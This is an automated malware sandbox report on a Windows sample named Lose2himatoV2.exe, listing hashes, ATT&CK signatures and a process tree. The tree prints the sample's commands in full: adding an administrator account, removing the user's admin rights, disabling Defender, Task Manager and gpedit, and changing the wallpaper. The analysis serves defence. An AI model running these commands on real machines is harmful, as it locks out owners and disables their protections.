974cb763c5670a8c187c5e7108964741b8c59590ac35f3bdccb2e069e2ec7506

Analysis

max time kernel
57s
max time network
62s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241211-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
04/01/2025, 23:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Lose2himatoV2.exe
Size

138.5MB
MD5

b13b58171063faf469d7cffd178644a6
SHA1

0cc178b5db25710be4181e0f15b70ca8c3049ef2
SHA256

974cb763c5670a8c187c5e7108964741b8c59590ac35f3bdccb2e069e2ec7506
SHA512

511d96d59fc5646aead6f0bf16ecbe9f9e1ab60e05954b02d2b53c7686df2ccfe85374388fc5aece04e50bd37ff3411319c7107d52cc33c3af819fb47ab570e3
SSDEEP

786432:Y93oFjO6NbbB6uTE/kbsV0jmB/gWD4otJ0njnEMIQAhpLoMS/QVQfmLh0VPdTtLH:Y9SjOsbbUng40ihpEX/QVQfmLmxHXutU

Score

9^/10

paypal defense_evasion discovery evasion phishing ransomware

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Disables Task Manager via registry modification
evasion

Indicator Removal: Network Share Connection Removal 1 TTPs 1 IoCs

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

defense_evasion

Network Share Connection Removal

T1070.005

pid	Process
3172	cmd.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1006597246-3150276181-3318461161-1000\Control Panel\International\Geo\Nation	Lose2himatoV2.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
31	discord.com
33	discord.com

Detected potential entity reuse from brand PAYPAL.
phishing paypal

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1006597246-3150276181-3318461161-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\MySingleFileApp\\wallpaper.bmp"	Lose2himatoV2.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\a6db7f5b-c294-42df-a8ea-d700df17987c.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20250104232649.pma	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 29 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Lose2himatoV2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	shutdown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1006597246-3150276181-3318461161-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1006597246-3150276181-3318461161-1000\{4D043E68-39E4-4A34-90E6-8CCE3C29FA9B}	msedge.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
2140	msedge.exe
2140	msedge.exe
3748	msedge.exe
3748	msedge.exe
3248	msedge.exe
3248	msedge.exe
2216	msedge.exe
2216	msedge.exe
6000	msedge.exe
6000	msedge.exe
4688	identity_helper.exe
4688	identity_helper.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

pid	Process
2216	msedge.exe
2216	msedge.exe
2216	msedge.exe
2216	msedge.exe
2216	msedge.exe
2216	msedge.exe
2216	msedge.exe
2216	msedge.exe
2216	msedge.exe
2216	msedge.exe
2216	msedge.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4212	shutdown.exe
Token: SeRemoteShutdownPrivilege	4212	shutdown.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
2216	msedge.exe
2216	msedge.exe
2216	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4648 wrote to memory of 1440	4648	Lose2himatoV2.exe	82
PID 4648 wrote to memory of 1440	4648	Lose2himatoV2.exe	82
PID 4648 wrote to memory of 1440	4648	Lose2himatoV2.exe	82
PID 4648 wrote to memory of 3272	4648	Lose2himatoV2.exe	84
PID 4648 wrote to memory of 3272	4648	Lose2himatoV2.exe	84
PID 4648 wrote to memory of 3272	4648	Lose2himatoV2.exe	84
PID 4648 wrote to memory of 704	4648	Lose2himatoV2.exe	86
PID 4648 wrote to memory of 704	4648	Lose2himatoV2.exe	86
PID 4648 wrote to memory of 704	4648	Lose2himatoV2.exe	86
PID 4648 wrote to memory of 3172	4648	Lose2himatoV2.exe	88
PID 4648 wrote to memory of 3172	4648	Lose2himatoV2.exe	88
PID 4648 wrote to memory of 3172	4648	Lose2himatoV2.exe	88
PID 1440 wrote to memory of 3176	1440	cmd.exe	89
PID 1440 wrote to memory of 3176	1440	cmd.exe	89
PID 1440 wrote to memory of 3176	1440	cmd.exe	89
PID 3176 wrote to memory of 4880	3176	net.exe	91
PID 3176 wrote to memory of 4880	3176	net.exe	91
PID 3176 wrote to memory of 4880	3176	net.exe	91
PID 4648 wrote to memory of 3948	4648	Lose2himatoV2.exe	92
PID 4648 wrote to memory of 3948	4648	Lose2himatoV2.exe	92
PID 4648 wrote to memory of 3948	4648	Lose2himatoV2.exe	92
PID 4648 wrote to memory of 2224	4648	Lose2himatoV2.exe	94
PID 4648 wrote to memory of 2224	4648	Lose2himatoV2.exe	94
PID 4648 wrote to memory of 2224	4648	Lose2himatoV2.exe	94
PID 3272 wrote to memory of 4928	3272	cmd.exe	95
PID 3272 wrote to memory of 4928	3272	cmd.exe	95
PID 3272 wrote to memory of 4928	3272	cmd.exe	95
PID 3172 wrote to memory of 1244	3172	cmd.exe	96
PID 3172 wrote to memory of 1244	3172	cmd.exe	96
PID 3172 wrote to memory of 1244	3172	cmd.exe	96
PID 4928 wrote to memory of 2548	4928	net.exe	97
PID 4928 wrote to memory of 2548	4928	net.exe	97
PID 4928 wrote to memory of 2548	4928	net.exe	97
PID 1244 wrote to memory of 3668	1244	net.exe	98
PID 1244 wrote to memory of 3668	1244	net.exe	98
PID 1244 wrote to memory of 3668	1244	net.exe	98
PID 704 wrote to memory of 1168	704	cmd.exe	99
PID 704 wrote to memory of 1168	704	cmd.exe	99
PID 704 wrote to memory of 1168	704	cmd.exe	99
PID 1168 wrote to memory of 2568	1168	net.exe	100
PID 1168 wrote to memory of 2568	1168	net.exe	100
PID 1168 wrote to memory of 2568	1168	net.exe	100
PID 3948 wrote to memory of 1372	3948	cmd.exe	101
PID 3948 wrote to memory of 1372	3948	cmd.exe	101
PID 3948 wrote to memory of 1372	3948	cmd.exe	101
PID 4648 wrote to memory of 4696	4648	Lose2himatoV2.exe	110
PID 4648 wrote to memory of 4696	4648	Lose2himatoV2.exe	110
PID 4648 wrote to memory of 4696	4648	Lose2himatoV2.exe	110
PID 4648 wrote to memory of 2000	4648	Lose2himatoV2.exe	112
PID 4648 wrote to memory of 2000	4648	Lose2himatoV2.exe	112
PID 4648 wrote to memory of 2000	4648	Lose2himatoV2.exe	112
PID 4696 wrote to memory of 4140	4696	cmd.exe	114
PID 4696 wrote to memory of 4140	4696	cmd.exe	114
PID 4696 wrote to memory of 4140	4696	cmd.exe	114
PID 2000 wrote to memory of 716	2000	cmd.exe	115
PID 2000 wrote to memory of 716	2000	cmd.exe	115
PID 2000 wrote to memory of 716	2000	cmd.exe	115
PID 4648 wrote to memory of 4028	4648	Lose2himatoV2.exe	116
PID 4648 wrote to memory of 4028	4648	Lose2himatoV2.exe	116
PID 4648 wrote to memory of 4028	4648	Lose2himatoV2.exe	116
PID 4648 wrote to memory of 1612	4648	Lose2himatoV2.exe	118
PID 4648 wrote to memory of 1612	4648	Lose2himatoV2.exe	118
PID 4648 wrote to memory of 1612	4648	Lose2himatoV2.exe	118
PID 4028 wrote to memory of 5116	4028	cmd.exe	120

C:\Users\Admin\AppData\Local\Temp\Lose2himatoV2.exe
"C:\Users\Admin\AppData\Local\Temp\Lose2himatoV2.exe"
1⤵
- Checks computer location settings
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4648
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c net user Lose2himato /add
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1440
- - C:\Windows\SysWOW64\net.exe
    net user Lose2himato /add
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3176
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user Lose2himato /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:4880
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c net user Lose2himato dumbass
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3272
- - C:\Windows\SysWOW64\net.exe
    net user Lose2himato dumbass
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4928
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user Lose2himato dumbass
      4⤵
      System Location Discovery: System Language Discovery
      PID:2548
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c net localgroup Administrators "Lose2himato" /add
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:704
- - C:\Windows\SysWOW64\net.exe
    net localgroup Administrators "Lose2himato" /add
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1168
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "Lose2himato" /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:2568
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c net localgroup Administrators "%USERNAME%" /delete
  2⤵
  - Indicator Removal: Network Share Connection Removal
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3172
- - C:\Windows\SysWOW64\net.exe
    net localgroup Administrators "Admin" /delete
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1244
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "Admin" /delete
      4⤵
      System Location Discovery: System Language Discovery
      PID:3668
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3948
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1372
- C:\Windows\SysWOW64\explorer.exe
  "explorer.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:2224
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4696
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4140
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2000
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:716
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4028
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5116
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1612
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2884
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start https://x.com/Lose2hxm4to
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2504
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://x.com/Lose2hxm4to
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    PID:2216
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x140,0x144,0x148,0x11c,0x14c,0x7ff9ffbe46f8,0x7ff9ffbe4708,0x7ff9ffbe4718
      4⤵
      PID:60
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2192,5678343544430208253,442985684688776840,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2212 /prefetch:2
      4⤵
      PID:1128
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2192,5678343544430208253,442985684688776840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3248
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2192,5678343544430208253,442985684688776840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2844 /prefetch:8
      4⤵
      PID:1604
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,5678343544430208253,442985684688776840,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
      4⤵
      PID:5200
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,5678343544430208253,442985684688776840,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
      4⤵
      PID:5212
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,5678343544430208253,442985684688776840,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4036 /prefetch:1
      4⤵
      PID:5440
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,5678343544430208253,442985684688776840,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4192 /prefetch:1
      4⤵
      PID:5592
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,5678343544430208253,442985684688776840,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4996 /prefetch:1
      4⤵
      PID:5208
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,5678343544430208253,442985684688776840,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:1
      4⤵
      PID:5448
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2192,5678343544430208253,442985684688776840,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5104 /prefetch:8
      4⤵
      PID:5972
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2192,5678343544430208253,442985684688776840,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5136 /prefetch:8
      4⤵
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      PID:6000
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,5678343544430208253,442985684688776840,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6240 /prefetch:1
      4⤵
      PID:792
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,5678343544430208253,442985684688776840,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6644 /prefetch:1
      4⤵
      PID:2720
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,5678343544430208253,442985684688776840,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6740 /prefetch:1
      4⤵
      PID:2060
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2192,5678343544430208253,442985684688776840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4104 /prefetch:8
      4⤵
      PID:928
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
      4⤵
      Drops file in Program Files directory
      PID:2088
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x2bc,0x2c0,0x2c4,0x298,0x2c8,0x7ff6b1e85460,0x7ff6b1e85470,0x7ff6b1e85480
        5⤵
        
        PID:4256
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2192,5678343544430208253,442985684688776840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4104 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4688
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,5678343544430208253,442985684688776840,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:1
      4⤵
      PID:5584
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,5678343544430208253,442985684688776840,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6652 /prefetch:1
      4⤵
      PID:5192
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start https://discord.gg/UkEYppsAck
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4512
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/UkEYppsAck
    3⤵
    PID:3044
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x140,0x144,0x148,0x124,0x14c,0x7ff9ffbe46f8,0x7ff9ffbe4708,0x7ff9ffbe4718
      4⤵
      PID:4476
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
